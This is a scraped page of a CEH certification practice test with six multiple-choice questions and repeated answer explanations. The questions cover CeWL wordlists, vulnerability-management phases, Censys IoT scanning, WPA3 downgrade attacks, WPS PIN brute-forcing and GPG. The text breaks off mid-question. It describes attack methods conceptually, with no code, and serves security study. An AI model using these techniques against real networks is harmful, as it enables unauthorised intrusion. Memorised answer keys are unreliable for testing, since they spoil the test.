You have already completed the Test before. Hence you can not start it again.
Test is loading...
You must sign in or sign up to start the Test.
You have to finish following quiz, to start this Test:
Your results are here!! for" CEH Practice Test 6 "
0 of 65 questions answered correctly
Your time:
Time has elapsed
Your Final Score is : 0
You have attempted : 0
Number of Correct Questions : 0 and scored 0
Number of Incorrect Questions : 0 and Negative marks 0
Average score
Your score
CEH
You have attempted: 0
Number of Correct Questions: 0 and scored 0
Number of Incorrect Questions: 0 and Negative marks 0
You can review your answers by clicking on “View Answers” option. Important Note : Open Reference Documentation Links in New Tab (Right Click and Open in New Tab).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Answered
Review
Question 1 of 65
1. Question
Such techniques as, for example, password cracking or enumeration are much more efficient and faster if performed using a wordlist. Of course, there are a huge number of them in different directions on the Internet or already installed in your Kali or Parrot OS, but an attacker can create his wordlist specifically for the target he is attacking. This requires conducting intelligence and collecting information about the victim. Many tools allow you to automate this process. Which of the following tools can scan a website and create a wordlist?
Correct
https://tools.kali.org/password-attacks/cewl CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. Incorrect answers: Orbot https://en.wikipedia.org/wiki/Orbot It is a free software Proxy server project to provide anonymity on the Internet for users of the Android operating system. It acts as an instance of the Tor network on such devices and allows traffic routing from a device‘s web browser, e-mail client, map program, etc., through the Tor network, providing anonymity for the user. Shadowsocks https://en.wikipedia.org/wiki/Shadowsocks Its is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship. Psiphon https://en.wikipedia.org/wiki/Psiphon It is a free and open-source Internet censorship circumvention tool that uses a combination of secure communication and obfuscation technologies (VPN, SSH, and HTTP Proxy). Psiphon is a centrally managed and geographically diverse network of thousands of proxy servers, using a performance-oriented, single- and multi-hop architecture.
Incorrect
https://tools.kali.org/password-attacks/cewl CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. Incorrect answers: Orbot https://en.wikipedia.org/wiki/Orbot It is a free software Proxy server project to provide anonymity on the Internet for users of the Android operating system. It acts as an instance of the Tor network on such devices and allows traffic routing from a device‘s web browser, e-mail client, map program, etc., through the Tor network, providing anonymity for the user. Shadowsocks https://en.wikipedia.org/wiki/Shadowsocks Its is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship. Psiphon https://en.wikipedia.org/wiki/Psiphon It is a free and open-source Internet censorship circumvention tool that uses a combination of secure communication and obfuscation technologies (VPN, SSH, and HTTP Proxy). Psiphon is a centrally managed and geographically diverse network of thousands of proxy servers, using a performance-oriented, single- and multi-hop architecture.
Unattempted
https://tools.kali.org/password-attacks/cewl CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. Incorrect answers: Orbot https://en.wikipedia.org/wiki/Orbot It is a free software Proxy server project to provide anonymity on the Internet for users of the Android operating system. It acts as an instance of the Tor network on such devices and allows traffic routing from a device‘s web browser, e-mail client, map program, etc., through the Tor network, providing anonymity for the user. Shadowsocks https://en.wikipedia.org/wiki/Shadowsocks Its is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship. Psiphon https://en.wikipedia.org/wiki/Psiphon It is a free and open-source Internet censorship circumvention tool that uses a combination of secure communication and obfuscation technologies (VPN, SSH, and HTTP Proxy). Psiphon is a centrally managed and geographically diverse network of thousands of proxy servers, using a performance-oriented, single- and multi-hop architecture.
Question 2 of 65
2. Question
Identify the correct sequence of steps involved in the vulnerability-management life cycle.
Correct
According to EC-Council courseware, the correct order is as follows: 1. Identify assets and create a baseline This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. 2. Vulnerability scan This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organizations infrastructure. 3. Risk assessment In this phase, all profound uncertainties associated with the system are assessed and prioritized, and remediation is planned to eliminate system flaws permanently. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. 4. Remediation Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps. 5. Verification In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. 6. Monitor Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved.
Incorrect
According to EC-Council courseware, the correct order is as follows: 1. Identify assets and create a baseline This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. 2. Vulnerability scan This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organizations infrastructure. 3. Risk assessment In this phase, all profound uncertainties associated with the system are assessed and prioritized, and remediation is planned to eliminate system flaws permanently. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. 4. Remediation Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps. 5. Verification In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. 6. Monitor Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved.
Unattempted
According to EC-Council courseware, the correct order is as follows: 1. Identify assets and create a baseline This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. 2. Vulnerability scan This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organizations infrastructure. 3. Risk assessment In this phase, all profound uncertainties associated with the system are assessed and prioritized, and remediation is planned to eliminate system flaws permanently. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. 4. Remediation Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps. 5. Verification In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. 6. Monitor Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved.
Question 3 of 65
3. Question
Ivan, a black hacker, wants to get information about IoT cameras and devices used by the attacked company. For these purposes, he will use a tool that collects information about the IoT devices connected to a network, open ports and services, and the attack surface area. Thanks to this tool, Ivan constantly monitors every available server and device on the internet. This opportunity will allow him to exploit these devices in the future. Which of the following tools did Ivan use to carry out this attack?
Correct
One more question where you must choose the tool according to the abstract description of the situation. You will meet several similar questions on the exam. To correctly answer such questions, you just need to know which tool does what without going into details. Censys https://censys.io/product/hnri/ Censys provides an automated monitoring solution, integrated with your existing IT work flow, to scan your employees home networks for exposures and vulnerabilities. The Censys HNRI ASM tool allows you to map your workforce, alerts you when risks are detected, and allows you to investigate changes over time. The Censys HNRI looking for: – Exposed IOT and embedded devices, such as cameras and routers; – Exposed telnet, FTP, and the like – plaintext services found on many IOT devices and home routers – many with default credentials; – Remote desktop sharing, such as PCAnywhere and RDP; – Network management exposures, such as Intel AMT and SNMP; – Exposed Microsoft LAN protocols like SMB – a popular vector for ransomware. NeuVector https://neuvector.com/ NeuVector delivers Full Lifecycle Container Security with the only cloud-native, Kubernetes security platform providing end-to-end vulnerability management, automated CI/CD pipeline security, and complete run-time security including the industrys only container firewall to protect your infrastructure from zero-days and insider threats. Lacework https://www.lacework.com/ Lacework is the data-driven security platform for the cloud. The Lacework Cloud Security Platform, powered by Polygraph, automates cloud security at scale so our customers can innovate with speed and safety. Wapiti https://wapiti.sourceforge.io/ Wapiti allows you to audit the security of your websites or web applications. It performs “black-box“ scans (it does not study the source code) of the web application by crawling the webpages of the deployed webapp, looking for scripts and forms where it can inject data.
Incorrect
One more question where you must choose the tool according to the abstract description of the situation. You will meet several similar questions on the exam. To correctly answer such questions, you just need to know which tool does what without going into details. Censys https://censys.io/product/hnri/ Censys provides an automated monitoring solution, integrated with your existing IT work flow, to scan your employees home networks for exposures and vulnerabilities. The Censys HNRI ASM tool allows you to map your workforce, alerts you when risks are detected, and allows you to investigate changes over time. The Censys HNRI looking for: – Exposed IOT and embedded devices, such as cameras and routers; – Exposed telnet, FTP, and the like – plaintext services found on many IOT devices and home routers – many with default credentials; – Remote desktop sharing, such as PCAnywhere and RDP; – Network management exposures, such as Intel AMT and SNMP; – Exposed Microsoft LAN protocols like SMB – a popular vector for ransomware. NeuVector https://neuvector.com/ NeuVector delivers Full Lifecycle Container Security with the only cloud-native, Kubernetes security platform providing end-to-end vulnerability management, automated CI/CD pipeline security, and complete run-time security including the industrys only container firewall to protect your infrastructure from zero-days and insider threats. Lacework https://www.lacework.com/ Lacework is the data-driven security platform for the cloud. The Lacework Cloud Security Platform, powered by Polygraph, automates cloud security at scale so our customers can innovate with speed and safety. Wapiti https://wapiti.sourceforge.io/ Wapiti allows you to audit the security of your websites or web applications. It performs “black-box“ scans (it does not study the source code) of the web application by crawling the webpages of the deployed webapp, looking for scripts and forms where it can inject data.
Unattempted
One more question where you must choose the tool according to the abstract description of the situation. You will meet several similar questions on the exam. To correctly answer such questions, you just need to know which tool does what without going into details. Censys https://censys.io/product/hnri/ Censys provides an automated monitoring solution, integrated with your existing IT work flow, to scan your employees home networks for exposures and vulnerabilities. The Censys HNRI ASM tool allows you to map your workforce, alerts you when risks are detected, and allows you to investigate changes over time. The Censys HNRI looking for: – Exposed IOT and embedded devices, such as cameras and routers; – Exposed telnet, FTP, and the like – plaintext services found on many IOT devices and home routers – many with default credentials; – Remote desktop sharing, such as PCAnywhere and RDP; – Network management exposures, such as Intel AMT and SNMP; – Exposed Microsoft LAN protocols like SMB – a popular vector for ransomware. NeuVector https://neuvector.com/ NeuVector delivers Full Lifecycle Container Security with the only cloud-native, Kubernetes security platform providing end-to-end vulnerability management, automated CI/CD pipeline security, and complete run-time security including the industrys only container firewall to protect your infrastructure from zero-days and insider threats. Lacework https://www.lacework.com/ Lacework is the data-driven security platform for the cloud. The Lacework Cloud Security Platform, powered by Polygraph, automates cloud security at scale so our customers can innovate with speed and safety. Wapiti https://wapiti.sourceforge.io/ Wapiti allows you to audit the security of your websites or web applications. It performs “black-box“ scans (it does not study the source code) of the web application by crawling the webpages of the deployed webapp, looking for scripts and forms where it can inject data.
Question 4 of 65
4. Question
Evil hacker Ivan knows that his target point and user are compatible with WPA2 and WPA 3 encryption mechanisms. He decided to install a rogue access point with only WPA2 compatibility in the vicinity and forced the victim to go through the WPA2 four-way handshake to connect. As soon as the connection is established, Ivan plans to use automated tools to crack WPA2-encrypted messages. Which of the following attacks does Ivan want to perform?
Correct
https://www.welivesecurity.com/2019/04/11/wpa3-flaws-steal-wifi-passwords/ Downgrade Security Attacks To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network. A downgrade security attack can be implemented in the following two ways. – Exploiting backward compatibility: If a user and AP are compatible with both WPA2 and WPA3 encryption mechanisms, then the attacker installs a rogue AP with only WPA2 compatibility in the vicinity and forces the client to go through the four-way handshake (WPA2) to get connected. Once the connection is established, the attacker uses all the attack tools available to exploit or crack the WPA2 encryption. – Exploiting the Dragonfly handshake: In this method, the attacker masquerades as an authentic AP. When a user attempts to exchange keys to access the Internet using the WPA3 authentication mechanism, the attacker informs the user that it does not support the WPA3 method. Then, the attacker suggests the use of a weaker encryption mechanism such as WPA2 for accessing the Internet. Subsequently, the attacker can use various techniques to exploit or crack the WPA2 encryption. Incorrect answers: Side-channel attack https://en.wikipedia.org/wiki/Side-channel_attack A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such as differential power analysis are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. through HTTPS or WiFi encryption), according to researchers from Microsoft Research and Indiana University. Many powerful side-channel attacks are based on statistical methods pioneered by Paul Kocher. Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks: see social engineering and rubber-hose cryptanalysis. General classes of side-channel attack include: Cache attack attacks based on attacker‘s ability to monitor cache accesses made by the victim in a shared physical system as in virtualized environment or a type of cloud service. Timing attack attacks based on measuring how much time various computations (such as, say, comparing an attacker‘s given password with the victim‘s unknown one) take to perform. Power-monitoring attack attacks that make use of varying power consumption by the hardware during computation. Electromagnetic attack attacks based on leaked electromagnetic radiation, which can directly provide plaintexts and other information. Such measurements can be used to infer cryptographic keys using techniques equivalent to those in power analysis or can be used in non-cryptographic attacks, e.g. TEMPEST (aka van Eck phreaking or radiation monitoring) attacks. Acoustic cryptanalysis attacks that exploit sound produced during a computation (rather like power analysis). Differential fault analysis in which secrets are discovered by introducing faults in a computation. Data remanence in which sensitive data are read after supposedly having been deleted. (i.e. Cold boot attack) Software-initiated fault attacks Currently a rare class of side-channels, Row hammer is an example in which off-limits memory can be changed by accessing adjacent memory too often (causing state retention loss). Optical – in which secrets and sensitive data can be read by visual recording using a high resolution camera, or other devices that have such capabilities (see examples below).
Incorrect
https://www.welivesecurity.com/2019/04/11/wpa3-flaws-steal-wifi-passwords/ Downgrade Security Attacks To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network. A downgrade security attack can be implemented in the following two ways. – Exploiting backward compatibility: If a user and AP are compatible with both WPA2 and WPA3 encryption mechanisms, then the attacker installs a rogue AP with only WPA2 compatibility in the vicinity and forces the client to go through the four-way handshake (WPA2) to get connected. Once the connection is established, the attacker uses all the attack tools available to exploit or crack the WPA2 encryption. – Exploiting the Dragonfly handshake: In this method, the attacker masquerades as an authentic AP. When a user attempts to exchange keys to access the Internet using the WPA3 authentication mechanism, the attacker informs the user that it does not support the WPA3 method. Then, the attacker suggests the use of a weaker encryption mechanism such as WPA2 for accessing the Internet. Subsequently, the attacker can use various techniques to exploit or crack the WPA2 encryption. Incorrect answers: Side-channel attack https://en.wikipedia.org/wiki/Side-channel_attack A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such as differential power analysis are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. through HTTPS or WiFi encryption), according to researchers from Microsoft Research and Indiana University. Many powerful side-channel attacks are based on statistical methods pioneered by Paul Kocher. Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks: see social engineering and rubber-hose cryptanalysis. General classes of side-channel attack include: Cache attack attacks based on attacker‘s ability to monitor cache accesses made by the victim in a shared physical system as in virtualized environment or a type of cloud service. Timing attack attacks based on measuring how much time various computations (such as, say, comparing an attacker‘s given password with the victim‘s unknown one) take to perform. Power-monitoring attack attacks that make use of varying power consumption by the hardware during computation. Electromagnetic attack attacks based on leaked electromagnetic radiation, which can directly provide plaintexts and other information. Such measurements can be used to infer cryptographic keys using techniques equivalent to those in power analysis or can be used in non-cryptographic attacks, e.g. TEMPEST (aka van Eck phreaking or radiation monitoring) attacks. Acoustic cryptanalysis attacks that exploit sound produced during a computation (rather like power analysis). Differential fault analysis in which secrets are discovered by introducing faults in a computation. Data remanence in which sensitive data are read after supposedly having been deleted. (i.e. Cold boot attack) Software-initiated fault attacks Currently a rare class of side-channels, Row hammer is an example in which off-limits memory can be changed by accessing adjacent memory too often (causing state retention loss). Optical – in which secrets and sensitive data can be read by visual recording using a high resolution camera, or other devices that have such capabilities (see examples below).
Unattempted
https://www.welivesecurity.com/2019/04/11/wpa3-flaws-steal-wifi-passwords/ Downgrade Security Attacks To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network. A downgrade security attack can be implemented in the following two ways. – Exploiting backward compatibility: If a user and AP are compatible with both WPA2 and WPA3 encryption mechanisms, then the attacker installs a rogue AP with only WPA2 compatibility in the vicinity and forces the client to go through the four-way handshake (WPA2) to get connected. Once the connection is established, the attacker uses all the attack tools available to exploit or crack the WPA2 encryption. – Exploiting the Dragonfly handshake: In this method, the attacker masquerades as an authentic AP. When a user attempts to exchange keys to access the Internet using the WPA3 authentication mechanism, the attacker informs the user that it does not support the WPA3 method. Then, the attacker suggests the use of a weaker encryption mechanism such as WPA2 for accessing the Internet. Subsequently, the attacker can use various techniques to exploit or crack the WPA2 encryption. Incorrect answers: Side-channel attack https://en.wikipedia.org/wiki/Side-channel_attack A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such as differential power analysis are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. through HTTPS or WiFi encryption), according to researchers from Microsoft Research and Indiana University. Many powerful side-channel attacks are based on statistical methods pioneered by Paul Kocher. Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks: see social engineering and rubber-hose cryptanalysis. General classes of side-channel attack include: Cache attack attacks based on attacker‘s ability to monitor cache accesses made by the victim in a shared physical system as in virtualized environment or a type of cloud service. Timing attack attacks based on measuring how much time various computations (such as, say, comparing an attacker‘s given password with the victim‘s unknown one) take to perform. Power-monitoring attack attacks that make use of varying power consumption by the hardware during computation. Electromagnetic attack attacks based on leaked electromagnetic radiation, which can directly provide plaintexts and other information. Such measurements can be used to infer cryptographic keys using techniques equivalent to those in power analysis or can be used in non-cryptographic attacks, e.g. TEMPEST (aka van Eck phreaking or radiation monitoring) attacks. Acoustic cryptanalysis attacks that exploit sound produced during a computation (rather like power analysis). Differential fault analysis in which secrets are discovered by introducing faults in a computation. Data remanence in which sensitive data are read after supposedly having been deleted. (i.e. Cold boot attack) Software-initiated fault attacks Currently a rare class of side-channels, Row hammer is an example in which off-limits memory can be changed by accessing adjacent memory too often (causing state retention loss). Optical – in which secrets and sensitive data can be read by visual recording using a high resolution camera, or other devices that have such capabilities (see examples below).
Question 5 of 65
5. Question
WPS is a rather troubled wireless network security standard. While it can make your life easier, it is also vulnerable to attacks. An attacker within radio range can brute-force the WPS PIN for a vulnerable access point, obtain WEP or WPA passwords, and likely gain access to the Wi-Fi network. However, first, the attacker needs to find a vulnerable point. Which of the following tools is capable of determining WPS-enabled access points?
Correct
https://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup WiFi Protected Setup (WPS) is a computing standard created by the WiFi Alliance to ease a wireless home network setup and security. WPS contains an authentication method called “external registrar“ that only requires the router‘s PIN. The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the eight-digit PIN is correct. The lack of a proper lock-out policy after a certain number of failed attempts to guess the PIN on many wireless routers makes this brute force attack that much more feasible. Once on the network, the attacker can monitor traffic and mount further attacks. Wash https://en.kali.tools/?p=341 Wash is a utility for identifying WPS enabled access points. It can survey from a live interface or it can scan a list of pcap files.It is an auxiliary tool designed to display WPS enabled Access Points and their main characteristics. Incorrect answers: net view https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11) Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain. Macof https://linux.die.net/man/8/macof macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). Ntptrace https://www.ibm.com/docs/en/aix/7.2?topic=n-ntptrace-command Traces a chain of Network Time Protocol (NTP) hosts back to their master time source.
Incorrect
https://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup WiFi Protected Setup (WPS) is a computing standard created by the WiFi Alliance to ease a wireless home network setup and security. WPS contains an authentication method called “external registrar“ that only requires the router‘s PIN. The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the eight-digit PIN is correct. The lack of a proper lock-out policy after a certain number of failed attempts to guess the PIN on many wireless routers makes this brute force attack that much more feasible. Once on the network, the attacker can monitor traffic and mount further attacks. Wash https://en.kali.tools/?p=341 Wash is a utility for identifying WPS enabled access points. It can survey from a live interface or it can scan a list of pcap files.It is an auxiliary tool designed to display WPS enabled Access Points and their main characteristics. Incorrect answers: net view https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11) Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain. Macof https://linux.die.net/man/8/macof macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). Ntptrace https://www.ibm.com/docs/en/aix/7.2?topic=n-ntptrace-command Traces a chain of Network Time Protocol (NTP) hosts back to their master time source.
Unattempted
https://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup WiFi Protected Setup (WPS) is a computing standard created by the WiFi Alliance to ease a wireless home network setup and security. WPS contains an authentication method called “external registrar“ that only requires the router‘s PIN. The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the eight-digit PIN is correct. The lack of a proper lock-out policy after a certain number of failed attempts to guess the PIN on many wireless routers makes this brute force attack that much more feasible. Once on the network, the attacker can monitor traffic and mount further attacks. Wash https://en.kali.tools/?p=341 Wash is a utility for identifying WPS enabled access points. It can survey from a live interface or it can scan a list of pcap files.It is an auxiliary tool designed to display WPS enabled Access Points and their main characteristics. Incorrect answers: net view https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11) Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain. Macof https://linux.die.net/man/8/macof macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). Ntptrace https://www.ibm.com/docs/en/aix/7.2?topic=n-ntptrace-command Traces a chain of Network Time Protocol (NTP) hosts back to their master time source.
Question 6 of 65
6. Question
Your boss has instructed you to introduce a hybrid encryption software program into a web application to secure email messages. You are planning to use free software that uses both symmetric-key cryptography and asymmetric-key cryptography for improved speed and secure key exchange. Which of the following meets these requirements?
Correct
GPG https://en.wikipedia.org/wiki/GNU_Privacy_Guard GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command-line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh). GnuPG is a hybrid-encryption software program because it uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange, typically by using the recipient‘s public key to encrypt a session key which is used only once. This mode of operation is part of the OpenPGP standard and has been part of PGP from its first version. Incorrect answers: SMTP https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol The Simple Mail Transfer Protocol (SMTP) is an internet standard communication protocol for electronic mail transmission. Mail servers and other message transfer agents use SMTP to send and receive mail messages. User-level email clients typically use SMTP only for sending messages to a mail server for relaying, and typically submit an outgoing email to the mail server on port 587 or 465 per RFC 8314. For retrieving messages, IMAP (which replaced the older POP3) is standard, but proprietary servers also often implement proprietary protocols, e.g., Exchange ActiveSync. PGP https://en.wikipedia.org/wiki/Pretty_Good_Privacy NOTE: Incorrect because PGP is a proprietary solution owned by Symantec, but the question asked about “free software.“ Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications. PGP and similar software follow the OpenPGP, an open standard of PGP encryption software, standard (RFC 4880) for encrypting and decrypting data. PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address. The first version of this system was generally known as a web of trust to contrast with the X.509 system, which uses a hierarchical approach based on certificate authority and which was added to PGP implementations later. Current versions of PGP encryption include options through an automated key management server. S/MIME https://en.wikipedia.org/wiki/S/MIME S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of MIME data. S/MIME is on an IETF standards track and defined in a number of documents, most importantly RFC 3369, 3370, 3850 and 3851. It was originally developed by RSA Data Security and the original specification used the IETF MIME specification with the de facto industry standard PKCS#7 secure message format. Change control to S/MIME has since been vested in the IETF and the specification is now layered on Cryptographic Message Syntax (CMS), an IETF specification that is identical in most respects with PKCS #7. S/MIME functionality is built into the majority of modern email software and interoperates between them. Since it is built on CMS, MIME can also hold an advanced digital signature.
Incorrect
GPG https://en.wikipedia.org/wiki/GNU_Privacy_Guard GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command-line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh). GnuPG is a hybrid-encryption software program because it uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange, typically by using the recipient‘s public key to encrypt a session key which is used only once. This mode of operation is part of the OpenPGP standard and has been part of PGP from its first version. Incorrect answers: SMTP https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol The Simple Mail Transfer Protocol (SMTP) is an internet standard communication protocol for electronic mail transmission. Mail servers and other message transfer agents use SMTP to send and receive mail messages. User-level email clients typically use SMTP only for sending messages to a mail server for relaying, and typically submit an outgoing email to the mail server on port 587 or 465 per RFC 8314. For retrieving messages, IMAP (which replaced the older POP3) is standard, but proprietary servers also often implement proprietary protocols, e.g., Exchange ActiveSync. PGP https://en.wikipedia.org/wiki/Pretty_Good_Privacy NOTE: Incorrect because PGP is a proprietary solution owned by Symantec, but the question asked about “free software.“ Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications. PGP and similar software follow the OpenPGP, an open standard of PGP encryption software, standard (RFC 4880) for encrypting and decrypting data. PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address. The first version of this system was generally known as a web of trust to contrast with the X.509 system, which uses a hierarchical approach based on certificate authority and which was added to PGP implementations later. Current versions of PGP encryption include options through an automated key management server. S/MIME https://en.wikipedia.org/wiki/S/MIME S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of MIME data. S/MIME is on an IETF standards track and defined in a number of documents, most importantly RFC 3369, 3370, 3850 and 3851. It was originally developed by RSA Data Security and the original specification used the IETF MIME specification with the de facto industry standard PKCS#7 secure message format. Change control to S/MIME has since been vested in the IETF and the specification is now layered on Cryptographic Message Syntax (CMS), an IETF specification that is identical in most respects with PKCS #7. S/MIME functionality is built into the majority of modern email software and interoperates between them. Since it is built on CMS, MIME can also hold an advanced digital signature.
Unattempted
GPG https://en.wikipedia.org/wiki/GNU_Privacy_Guard GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command-line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh). GnuPG is a hybrid-encryption software program because it uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange, typically by using the recipient‘s public key to encrypt a session key which is used only once. This mode of operation is part of the OpenPGP standard and has been part of PGP from its first version. Incorrect answers: SMTP https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol The Simple Mail Transfer Protocol (SMTP) is an internet standard communication protocol for electronic mail transmission. Mail servers and other message transfer agents use SMTP to send and receive mail messages. User-level email clients typically use SMTP only for sending messages to a mail server for relaying, and typically submit an outgoing email to the mail server on port 587 or 465 per RFC 8314. For retrieving messages, IMAP (which replaced the older POP3) is standard, but proprietary servers also often implement proprietary protocols, e.g., Exchange ActiveSync. PGP https://en.wikipedia.org/wiki/Pretty_Good_Privacy NOTE: Incorrect because PGP is a proprietary solution owned by Symantec, but the question asked about “free software.“ Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications. PGP and similar software follow the OpenPGP, an open standard of PGP encryption software, standard (RFC 4880) for encrypting and decrypting data. PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address. The first version of this system was generally known as a web of trust to contrast with the X.509 system, which uses a hierarchical 